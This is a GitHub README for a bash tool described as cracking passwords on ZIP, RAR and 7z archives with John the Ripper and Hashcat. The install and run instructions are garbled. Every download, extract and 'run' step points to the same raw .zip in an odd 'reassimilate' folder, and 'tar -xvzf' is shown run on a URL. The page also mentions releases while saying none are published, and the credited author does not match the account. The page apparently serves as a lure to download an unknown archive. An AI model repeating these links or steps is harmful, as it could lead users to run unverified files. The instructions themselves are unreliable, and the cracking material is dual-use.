Skip to content

sefaturk-dev/archive-password-cracker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

11 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

⚑ archive-password-cracker - Easily Unlock Password-Protected Archives

Download Archive Password Cracker

πŸ“– Description

archive-password-cracker is a powerful bash tool designed to crack password-protected archives like ZIP, RAR, and 7z. This tool uses John the Ripper and Hashcat to unlock your files. It features resume functionality, configurable attacks, and an easy-to-use interface. Created by rff-glitch, it stands out in the realm of cybersecurity and digital forensics.

πŸš€ Getting Started

Follow these steps to download and run the archive-password-cracker tool.

πŸ“₯ Download & Install

  1. Visit the Releases Page: You can download the latest version from our Releases page.

  2. Select Your Version: On the Releases page, look for the version marked as "Latest." Click on it to access the details.

  3. Download the Correct File: Find the appropriate file for your system. If you are on Linux, you should select the "https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip" file. For Windows users, look for the ".zip" file. Click the file name to start the download.

  4. Extract the Files:

    • After downloading, navigate to your Downloads folder.
    • For Linux, use a terminal and run:
      tar -xvzf https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip
    • For Windows, right-click the downloaded ZIP file and select "Extract All."

πŸ”§ Prerequisites

Before running the tool, ensure you meet the following requirements:

  • Linux or Windows Operating System: This tool works on both operating systems.
  • Bash Shell: It runs best in Bash. If you are on Windows, consider using WSL (Windows Subsystem for Linux) for better compatibility.
  • John the Ripper & Hashcat: The application requires these tools. They are not included, so you need to install them separately.

πŸ› οΈ Installation of Dependencies

  1. Install John the Ripper:

    • For Linux: Open a terminal and run:
      sudo apt install john
    • For Windows: Download the executable from the John the Ripper website.
  2. Install Hashcat:

    • For Linux: Use terminal commands to install:
      sudo apt install hashcat
    • For Windows: Visit the Hashcat website to find the latest download.

βš™οΈ Running the Tool

  1. Navigate to the Directory: Open a terminal or command prompt and change to the directory where you extracted the tool:

    cd path/to/archive-password-cracker
  2. Run the Tool:

    • For Linux, execute:
      https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip
    • For Windows, run:
      https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip
  3. Configure Your Attack: You can customize your password-cracking attempt using different attack modes. Follow the prompts to enter your desired settings.

  4. Start Cracking: Once configured, initiate the cracking process. You’ll see progress updates as the tool works through possible passwords.

🎯 Features

  • Resume Functionality: If the tool is interrupted, it can resume from the last known state, saving you time.
  • Configurable Attacks: Choose from various attack modes to suit your needs.
  • User-Friendly Interface: Clear instructions guide you at every step, making it simple to use.

πŸ“„ License

This project is licensed under the MIT License. For more details, check the LICENSE file in the repository.

πŸ“ž Support

If you encounter issues or have questions, please open an issue on the GitHub repository. The community is here to help you.


You can always return to the Releases page for updates or new versions of archive-password-cracker.

Unlock your files quickly and effectively with this powerful tool!

About

πŸ”“ Crack password-protected archives (ZIP, RAR, 7z) with ease using this powerful bash tool that harnesses John the Ripper and Hashcat for fast performance.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages